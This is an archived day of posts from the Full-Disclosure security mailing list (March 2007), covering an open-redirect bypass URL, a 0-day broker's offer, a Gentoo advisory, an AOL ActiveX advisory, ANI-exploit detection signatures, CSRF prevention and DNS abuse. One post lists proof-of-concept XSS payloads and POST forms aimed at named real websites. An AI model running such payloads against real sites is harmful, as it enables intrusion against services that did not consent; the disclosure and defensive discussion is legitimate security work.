Re: [Full-disclosure] NewOrder.box.sk Inherits Severe

2007-03-30 Thread bugtraq
Referer checking will not stop open redirects you must create a whitelist. 
Consider the following

http://site/script?u=http://site/script?u=http://cnn.com

It will hit the script, redirect back to itself set the referer header then 
continue.

- Robert
http://www.cgisecurity.com/ Application security news and more.
http://www.cgisecurity.com/index.rss [RSS Feed]

 
 Hello Aditya,
 I see your point there. Hope they get it fixed. Should the patch involve
 some referrer checking?
 
 Regards,
 -Nikolay Kichukov
 
 - Original Message - 
 From: Aditya K Sood [EMAIL PROTECTED]
 To: Nikolay Kichukov [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Thursday, March 29, 2007 7:40 PM
 Subject: Re: [Full-disclosure] NewOrder.box.sk Inherits Severe
 RedirectionVulnerability
 
 
  Nikolay Kichukov wrote:
   Hello there,
   I've read the article, but I still do not see where the severe
 redirection
   vulnerability is. Is this not a feature of the neworder.box.sk web site
 to
   allow anyone to be redirected to anypage they submit to redirect.php?
  
   Thanks,
   -Nikolay Kichukov
  
  
   - Original Message - 
   From: Aditya K Sood [EMAIL PROTECTED]
   To: full-disclosure@lists.grok.org.uk
   Sent: Wednesday, March 28, 2007 8:49 PM
   Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe
   RedirectionVulnerability
  
  
  
   Hi
  
   Previous Rootkit.com Vulnerability have been patched.
   The neworder.box.sk is famous security website.It inherits very
 specific
   redirection attacks. The domain forwarding or URL forwarding not only
   directly possible through the website but can be called from third
 party
   directly.
  
   A very generic analysis have been undertaken based on search engine
   specification.Look into the issues at:
  
  
 http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html
   http://zeroknock.metaeye.org/analysis/neworder_red.xhtml
  
   Regards
   Zeroknock
   http://zeroknock.metaeye.org/mlabs
  
   ___
   Full-Disclosure - We believe in it.
   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
   Hosted and sponsored by Secunia - http://secunia.com/
  
  
  
  
  
  Hi nikolay
 
 Thats where the thinking is bit off side.
  Remember there
  is lot of difference between redirection occurs from the main website
  through generating event and the redirection  that occurs from the third
  party.It will be okay to the feature context if the redirection supports
  only from the website.
 
  More precisely a search engine check is performed at the top to show
  that the page is not subjected as standard page for redirection. If its
  a feature than it must not be redirected from the third party.
 
  Thats All.
 
  Regards
  Adi
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)

2007-03-30 Thread James Rankin

hackers blitz into Tk-Maxx - unfortunate...

http://news.bbc.co.uk/1/hi/business/6508983.stm
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] secure listserv config

2007-03-30 Thread imipak
What? A security company sets up a mailing list, but allows any tom,
dick or J.Random Hacker Jr. III to post to it? Then fails to notice
the storm of people saying unsubscribe!, me, too!, shut up!,
stop sending me all this crap! and No, you stop!??

Inconceivable!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Preventing Cross-site Request Forgeries

2007-03-30 Thread pdp (architect)
http://www.gnucitizen.org/blog/preventing-csrf

I briefly covered how simple it is to prevent CSRF attacks. Hope that
you find it useful.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Buy 0day vulnerability

2007-03-30 Thread Guasconi Vincent
On 3/29/07, Michael Bann [EMAIL PROTECTED] wrote:
 [EMAIL PROTECTED] wrote:
  We buy and sell 0day vulnerability along with working demostrative exploit.
 
  We are interested only in client side exploits.
 
  We are interested in Internet Explorer and Microsoft Office.
 
  If you have good vulnerability we can pay cash, western union or wire 
  transfer in advance.
 
  If you are a motivated researcher and are interested in a full time 
  consultancy let us to know.
 
  Please contact to this email address.
 
  We own and sell several Microsoft 0day (the one used by a couple of asiatic 
  intelligence agencies) and we buy them from skilled hackers.

 Correct me if I'm wrong, but wouldn't that defeat the point of Full
 Disclosure?

Correct him if I'm right, but wouldn't that defeat the point of Full Disclosure?

-- 
Guasconi Vincent
Etudiant.
http://altmylife.blogspot.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Buy 0day vulnerability

2007-03-30 Thread Peter Dawson

maybe it just an invite to the dark side of the force

On 3/30/07, Guasconi Vincent [EMAIL PROTECTED] wrote:




 Correct me if I'm wrong, but wouldn't that defeat the point of Full
 Disclosure?

Correct him if I'm right, but wouldn't that defeat the point of Full
Disclosure?

--
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Buy 0day vulnerability

2007-03-30 Thread Guasconi Vincent
On 3/30/07, Peter Dawson [EMAIL PROTECTED] wrote:
 On 3/30/07, Guasconi Vincent [EMAIL PROTECTED] wrote:
  
   Correct me if I'm wrong, but wouldn't that defeat the point of Full
   Disclosure?
 
  Correct him if I'm right, but wouldn't that defeat the point of Full
  Disclosure?

 maybe it just an invite to the dark side of the force

I will be a good Jedi, like my father

-- 
Guasconi Vincent
Etudiant.
http://altmylife.blogspot.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

2007-03-30 Thread Michal Majchrowicz
It seems that Vista has some problems with ATI drivers.
It was already reported that file atikmdag.sys can cause BSoD after
leaving the game
(http://leovilletownsquare.com/fusionbb/showtopic.php?tid/17600/ ).
Today user with nickname Olo contacted my and by making some tests we
where able to determine that there are more problems with this driver
and Vista. We where using this configuration:
http://sectroyer.110mb.com/vuln/hardware.jpg
Everytime you try to turn on the slideshow with a JPG file in the
folder you get BSoD (http://sectroyer.110mb.com/vuln/vista_bsod.jpg ).
You can test it by turning on the slideshow in the following
directory: c:Windows\Web\Wallpaper\
Since this case cannot be connect with 2d-3d mode changes it seems
that there is some vulnerability directly in Windows Vista which cause
this BSoD in atikmdag.sys (ATI Kernel Driver). This vulnerability can
be used as a DoS but Code Execution haven't been confirmed or denied.
Regards Michael Majchrowicz.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MADYNES voip fuzzer

2007-03-30 Thread Juan Perez
Shawn, this fuzzer seems to be based on their KIPH
framework. The KIPH software is not freely available.

I wonder if they would release to researchers..

Jay

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

2007-03-30 Thread 3APA3A
Dear Micha³ Majchrowicz,

This  image  also  effectively  exploits stack overflow (?) in FastStone
Image Viewer 2.8, EIP/EBP is 0x41414141.

--Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]:

MM Everytime  you  try  to turn on the slideshow with a JPG file in the
MM folder  you get BSoD
MM (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by
MM turningonthe   slideshow   in   the   following   directory:
MM c:Windows\Web\Wallpaper\  Since  this  case  cannot  be connect with


-- 
~/ZARAZA http://securityvulns.com/
Ïàòðèîòèçì - ýòî òà æå ðåëèãèÿ. (Òâåí)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] A lot of XSS

2007-03-30 Thread Hanno Böck
Blog-Entry:
http://www.hboeck.de/item/468

http://www.netbeat.de/bestellen/domaincheck.html?scriptalert(1)/script
http://www.netbeat.de/support/kommentare.html?name=;scriptalert(1)/script
http://www.symlink.ch/users.pl?unickname=;scriptalert(1)/script
http://www.stuttgart.de/sde/search.php?search=%22scriptalert%281%29/script
http://www.holidayranking.de/search.html?searchSearchString=;scriptalert(1)/script
http://www.freecity.de/suche/index.phtml?gosearch=yeswords=;scriptalert(1)/script
http://search.netdoktor.com/results.html?qt=;scriptalert(1)/scriptla=de
http://www.vfb.de/de/suche/index.php?words=;scriptalert(1)/script
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt=;scriptalert(1)/script

And some with post:

form method=post 
action=http://www.adac.de/Search/SearchResult/RW_SearchResult.asp;
input type=hidden name=RWQuery value='scriptalert(1)/script'/
input type=submit value=adac.de/
/form
form method=post 
action=http://www.tu-berlin.de/www/software/java/cgi-bin/search.pl;
input type=hidden NAME=terms value='scriptalert(1)/script'/
input type=submit value=hoax-info.de/
/form


-- 
Hanno Böck  Blog:   http://www.hboeck.de/
GPG: 3DBD3B20   Jabber: [EMAIL PROTECTED]


pgpr70zbLB1Hh.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Buy 0day vulnerability

2007-03-30 Thread Maxime Ducharme
 

nooo i hear darth vader !

;)


Max



maybe it just an invite to the dark side of the force 


On 3/30/07, Guasconi Vincent [EMAIL PROTECTED] wrote: 



 Correct me if I'm wrong, but wouldn't that defeat the point of
Full 
 Disclosure?

Correct him if I'm right, but wouldn't that defeat the point of Full
Disclosure?

--



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)

2007-03-30 Thread James Matthews

Things will only get worse!

On 3/30/07, James Rankin [EMAIL PROTECTED] wrote:


hackers blitz into Tk-Maxx - unfortunate...

http://news.bbc.co.uk/1/hi/business/6508983.stm

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

2007-03-30 Thread James Matthews

Now all we need is an exploit... I am thinking why isn't there a Month of
windows bugs..

On 3/30/07, 3APA3A [EMAIL PROTECTED] wrote:


Dear Michaі Majchrowicz,

This  image  also  effectively  exploits stack overflow (?) in FastStone
Image Viewer 2.8, EIP/EBP is 0x41414141.

--Monday, March 26, 2007, 12:20:07 AM, you wrote to
[EMAIL PROTECTED]:

MM Everytime  you  try  to turn on the slideshow with a JPG file in the
MM folder  you get BSoD
MM (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by
MM turningonthe   slideshow   in   the   following   directory:
MM c:Windows\Web\Wallpaper\  Since  this  case  cannot  be connect with


--
~/ZARAZA http://securityvulns.com/
Патриотизм - это та же религия. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

2007-03-30 Thread Jim Popovitch
On Fri, 2007-03-30 at 12:46 -0700, James Matthews wrote:
 I am thinking why isn't there a Month of windows bugs.. 

LOL! :-)  Simply because that's what the other 11 months in a year are
for. 

-Jim P.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ GLSA 200703-26 ] file: Integer underflow

2007-03-30 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200703-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: file: Integer underflow
  Date: March 30, 2007
  Bugs: #171452
ID: 200703-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer underflow vulnerability has been reported in file allowing for
the user-assisted execution of arbitrary code.

Background
==

file is a utility that guesses a file format by scanning binary data
for patterns.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  sys-apps/file4.20= 4.20

Description
===

Jean-Sébastien Guay-Leroux reported an integer underflow in
file_printf function.

Impact
==

A remote attacker could entice a user to run the file program on a
specially crafted file that would trigger a heap-based buffer overflow
possibly leading to the execution of arbitrary code with the rights of
the user running file. Note that this vulnerability could be also
triggered through an automatic file scanner like amavisd-new.

Workaround
==

There is no known workaround at this time.

Resolution
==

Since file is a system package, all Gentoo users should upgrade to the
latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =sys-apps/file-4.20

References
==

  [ 1 ] CVE-2007-1536
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1536

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-26.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpMPYrEMtXVd.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] TSRT-07-03: America Online SuperBuddy ActiveX Control Code Execution Vulnerability

2007-03-30 Thread TSRT
TSRT-07-03: America Online SuperBuddy ActiveX Control Code Execution
http://www.tippingpoint.com/security/advisories/TSRT-07-03.html
March 30, 2007

-- CVE ID:
CVE-2006-5820

-- Affected Vendor:
America Online

-- Affected Products:
America Online 9.0 Security Edition

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November 6, 2006 by Digital Vaccine protection
filter ID 4553. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of America Online with Microsoft Internet
Explorer. User interaction is required to exploit this vulnerability in
that the target must visit a malicious page.

The specific flaw exists in the LinkSBIcons() method exposed through
the ActiveX control 'Sb.SuperBuddy.1' with the following CLSID:

189504B8-50D1-4AA8-B4D6-95C8F58A6414

The affected control implements the IObjectSafety interface and
therefore allows a web site to invoke the control under default
Internet Explorer settings without any further user interaction.  The
vulnerable method is defined as:

int LinkSBIcons(IUnknown *interface)

As the method accepts an unchecked user-controlled value specifying a
pointer to an object, a subsequent function dereference is completely
under attacker control. This can easily lead to arbitrary code
execution under the context of the logged in user.

It is important to note that many PCs ship with this vulnerable
component by default, including Dell and Hewlett-Packard among others.
Since AOL is addressing this issue as an update through their internet
service, many users are left without any recourse for mitigation.
Concerned users can specify a kill bit for the affected control to
prevent it from loading within Internet Explorer. To do so, create the
following registry key:

HKEY_LOCAL_MACHINE\
SOFTWARE\
Microsoft\
Internet Explorer\
ActiveX Compatibility\
{189504B8-50D1-4AA8-B4D6-95C8F58A6414}

With the value 'Compatibility Flags' set to 0x400.

-- Vendor Response:
America Online has issued an update to correct this vulnerability as of
3/29/2007. The update is automatically applied the next time users log
into the AOL service.

-- Disclosure Timeline:
2006.07.18 - Vulnerability reported to vendor
2006.11.06 - Digital Vaccine released to TippingPoint customers
2007.03.30 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, Tipping Point Security
Research Team.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

2007-03-30 Thread Guasconi Vincent
On 3/30/07, James Matthews [EMAIL PROTECTED] wrote:
 Now all we need is an exploit... I am thinking why isn't there a Month of
 windows bugs..

http://www.securinfos.info/english/the-week-of-vista-bugs.php [en]
http://movb.blogspot.com/ [fr]

-- 
Guasconi Vincent
Etudiant.
http://altmylife.blogspot.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)

2007-03-30 Thread Alexander Sotirov
Jan Wrobel wrote:
 I don't know if this rule detects all possible exploits or just one
 particular type. Here is a Firekeeper version of the rule, which can
 be used to detect sites hosting malicious files:
 
 alert (msg:BLEEDING-EDGE CURRENT EVENTS MS ANI exploit; body_content:|54 
 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 
 68 52|; reference:url,http://isc.sans.org/diary.html?storyid=2534; 
 reference:url,http://www.avertlabs.com/research/blog/?p=233; 
 reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;)

A better way would be to look for all files that start with RIFF and contain
two copies of the string anih, the first one followed by the dword 0x24, the
second one followed by a dword that's not 0x24. This should detect the
exploitation of the stack overflow with no false negatives. To avoid false
positives, you'll need code to parse all records in the ANI file and check for
more an anih record with a size not equal to 0x24.

Here's the regexp in Perl (somebody please convert it to a Snort rule)

/^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)/

Alex



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exe vulnerability

2007-03-30 Thread Williams, James K

CA is aware that functional exploit code was publicized on 
March 30, 2007 for a CA BrightStor ARCserve Backup Mediasvr.exe 
vulnerability. 

We have verified that a high risk vulnerability does exist and we 
are now working on a patch to address the issue. 

CA recommends that BrightStor ARCserve Backup users implement the 
following temporary workaround to mitigate the vulnerability: 

1) Rename the mediasvr.exe file to a non-functional file name, 
   such as mediasvc.exe.disable.

2) Then restart the CA BrightStor Tape Engine service.

This will disable the command line functionality in the product 
(i.e. command line utilities such as ca_backup, ca_restore, 
ca_merge, ca_qmgr, ca_scan, etc will not work).

After we have completed our analysis of the issue, we will post 
an update and patches on the CA SupportConnect website. If 
additional information is required, please contact CA Technical 
Support at http://supportconnect.ca.com.

If you discover a vulnerability in CA products, please report 
your findings to vuln at ca dot com, or utilize our Submit a 
Vulnerability form at 
http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza, Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright (c) 2007 CA. All rights reserved.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows(CVE-2007-0038)

2007-03-30 Thread Eric Sites
You really need to check for:

RIFF[4 byte file size] -- The file size can be ignored.
Then the next 4 byte after the file size should contain:
ACON

Then look for:

anih and the 4 byte value following it greater than 0x50, this is the
stack buffer overflow point. New ANIs can be built with any number of
anih chunks and only one of them needs to be larger than 80 bytes
decimal.

Cheers,
Eric Sites, CTO
Sunbelt Software


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Alexander Sotirov
Sent: Friday, March 30, 2007 8:29 PM
To: Jan Wrobel
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft
Windows(CVE-2007-0038)

Jan Wrobel wrote:
 I don't know if this rule detects all possible exploits or just one
 particular type. Here is a Firekeeper version of the rule, which can
 be used to detect sites hosting malicious files:
 
 alert (msg:BLEEDING-EDGE CURRENT EVENTS MS ANI exploit;
body_content:|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00
00 02 02 02 02 61 6E 69 68 52|;
reference:url,http://isc.sans.org/diary.html?storyid=2534;
reference:url,http://www.avertlabs.com/research/blog/?p=233;
reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;)

A better way would be to look for all files that start with RIFF and
contain
two copies of the string anih, the first one followed by the dword
0x24, the
second one followed by a dword that's not 0x24. This should detect the
exploitation of the stack overflow with no false negatives. To avoid
false
positives, you'll need code to parse all records in the ANI file and
check for
more an anih record with a size not equal to 0x24.

Here's the regexp in Perl (somebody please convert it to a Snort rule)

/^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)/

Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability

2007-03-30 Thread Morning Wood

 If you discover a vulnerability in CA products, please report
 your findings to vuln at ca dot com, or utilize our Submit a
 Vulnerability form at
 http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.

Looks like a vuln is found once a week in C.A products
esp in you Backup and Anti-Viri products.

3 are listed currently on your own page
http://www3.ca.com/securityadvisor/vulninfo/

and um...
http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmcpst=computer%20associates;


tired of seeing C.A. exploits!!!
especially the corporate products,

 your clients must thank you for providing remote access in EVERY PROGRAM 
YOU RELEASE
( i know the blackhats do )
please delete these products from your catalog.
m.w


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]

2007-03-30 Thread Chris Weber
Nice article.  

For the ASP.NET crowd out there, the will be even more simple, one line of
code.  Set the ViewStateUserKey property in your base class or page and the
unique token protections (similar to CSRF_Guard) will be provided for you.

http://msdn2.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey
.aspx

This protection mechanism has been available for many years, since the
Framework 1.1





-Original Message-
From: pdp (architect) [mailto:[EMAIL PROTECTED] 
Sent: Friday, March 30, 2007 3:16 AM
To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries

http://www.gnucitizen.org/blog/preventing-csrf

I briefly covered how simple it is to prevent CSRF attacks. Hope that you
find it useful.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org


Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]

2007-03-30 Thread Michael Sutton
The EnableEventValidation page directive (enabled by default since .Net
2.0) applies a nonce value for form validation and is also a strong
control to prevent CSRF attacks. 

Michael Sutton
Security Evangelist
SPI Dynamics
http://portal.spidynamics.com/blogs/msutton

 -Original Message-
 From: Chris Weber [mailto:[EMAIL PROTECTED]
 Sent: Friday, March 30, 2007 6:12 PM
 To: 'pdp (architect)'; full-disclosure@lists.grok.org.uk; 'WASC
Forum';
 'webappsec @OWASP'
 Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries
 [ASP.NET crowd]
 
 Nice article.
 
 For the ASP.NET crowd out there, the will be even more simple, one
line of
 code.  Set the ViewStateUserKey property in your base class or page
and
 the
 unique token protections (similar to CSRF_Guard) will be provided for
you.
 
 http://msdn2.microsoft.com/en-
 us/library/system.web.ui.page.viewstateuserkey
 .aspx
 
 This protection mechanism has been available for many years, since the
 Framework 1.1
 
 
 
 
 
 -Original Message-
 From: pdp (architect) [mailto:[EMAIL PROTECTED]
 Sent: Friday, March 30, 2007 3:16 AM
 To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
 Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries
 
 http://www.gnucitizen.org/blog/preventing-csrf
 
 I briefly covered how simple it is to prevent CSRF attacks. Hope that
you
 find it useful.
 
 --
 pdp (architect) | petko d. petkov
 http://www.gnucitizen.org
 


--
 --
 Join us on IRC: irc.freenode.net #webappsec
 
 Have a question? Search The Web Security Mailing List Archives:
 http://www.webappsec.org/lists/websecurity/
 
 Subscribe via RSS:
 http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
 
 


--
 --
 Join us on IRC: irc.freenode.net #webappsec
 
 Have a question? Search The Web Security Mailing List Archives:
 http://www.webappsec.org/lists/websecurity/
 
 Subscribe via RSS:
 http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] On-going Internet Emergency and Domain Names

2007-03-30 Thread Gadi Evron
There is a current on-going Internet emergency: a critical 0day
vulnerability currently exploited in the wild threatens numerous desktop
systems which are being compromised and turned into bots, and the domain
names hosting it are a significant part of the reason why this attack has
not yet been mitigated.

This incident is currenly being handled by several operational groups.

This past February, I sent an email to the Reg-Ops (Registrar
Operations) mailing list. The email, which is quoted below, states how DNS
abuse (not the DNS infrastructure) is the biggest unmitigated current
vulnerability in day-to-day Internet security operations, not to mention
abuse.

While we argue about this or that TLD, there are operational issues of the
highest importance that are not being addressed.

The following is my original email message, elaborating on these above
statements. Please note this was indeed just an email message, sent among
friends.

- Begin quoted message -
Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST)
From: Gadi Evron
To: [EMAIL PROTECTED]
Subject: [reg-ops] Internet security and domain names

Hi all, this is a tiny bit long. Please have patience, this is important.

On this list (which we maintain as low-traffic) you guys (the
registrars) have shown a lot of care and have become, on our sister
mitigation and research lists (those of you who are subscribed), an
integral part of our community we now call The Internet Security
Operations Community.

We face problems today though, that you can not help us solve under the
current setting. But only you can help us coming up with new ideas.

Day-to-day, we are able to report hundreds and thousands of completely
bogus phishing and other bad domains, but both policy-wise and
resources-wise, registrars can't handle this. I don't blame you.

In emergencies, we can only mitigate threats if one of you or yours are in
control.. Just a week ago we faced the problem of the Dolphins stadium
being hacked and malicious code being put on it:

1. We tracked down all the IP addresses involved and mitigated them (by we
I mean also people other than me. Many were involved).
2. We helped the Dolphins Stadium IT staff take care of the malicious code
on their web page - Specifically Gary Warner).
3. We coordinated with law enforcement.
4. We coordinated that no one does a press release which will hurt law
enforcement.
5. We did a lot more. Including actually convincing a Chinese registrar to
pull one of the domains in question. A miracle. There was another domain
to be mitigated, unsuccessfully.

One thing though - at a second's notice, this could all be for nothing as
the DNS records could be updated with new IP addresses. There were
hundreds of other sites also infected.

Even if we could find the name server admin, some of these domains have as
many as 40 NSs. That doesn't make life easy. Then, these could change,
too.

This is the weakest link online today in Internet security, which we in
most cases can't mitigate, and the only mitigation route is the domain
name.

Every day we see two types of fast-flux attacks:
1. Those that keep changing A records by using a very low TTL.
2. Those that keep changing NS records, pretty much the same.

Now, if we have a domain which can be mitigated to solve such
emergencies and one of you happen to run it, that's great...
However, if we end up with a domain not under the care of you and
yours.. we are simply.. fucked. Sorry for the language.

ICANN has a lot of policy issues as well, and the good guys there can't
help. ICANN has enough trouble taking care of all those who want money for
.com, .net or .xxx.

All that being said, the current situation can not go on. We can no longer
ignore it nor are current measures sufficient. It is imperative that we
find some solutions, as limited as they may be.

We need to be able to get rid of domain names, at the very least during
real emergencies. I am aware how it isn't always easy to distinguish what
is good and what is bad. Still, we need to find a way.

Members of reg-ops:
What do you think can be conceivably done? How can we make a difference
which is REALLY needed on today's Internet?

Please participate and let me know what you think, we simply can no longer
wait for some magical change to happen.

   Gadi.
- End of quoted message -

Thousands of malicious domain names and several weeks later, we face the
current crisis. The 0day vulnerability is exploited in the wild, and
mitigating the IP addresses is not enough. We need to be able to get
rid of malicious domain names. We need to be able to mitigate attacks on
the weakest link - DNS, which are not necessarily solved by DNS-SEC or
Anycast.

On Reg-Ops and other operational groups, we came up with some imperfect
ideas on what we can make happen on our own in short term which will help
us reach better mitigation, as security does not seem to be on the agenda
of those running DNS:

1. A system by which registrars can 

Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)

2007-03-30 Thread Jan Wrobel
On Thu, 29 Mar 2007, Alexander Sotirov wrote:

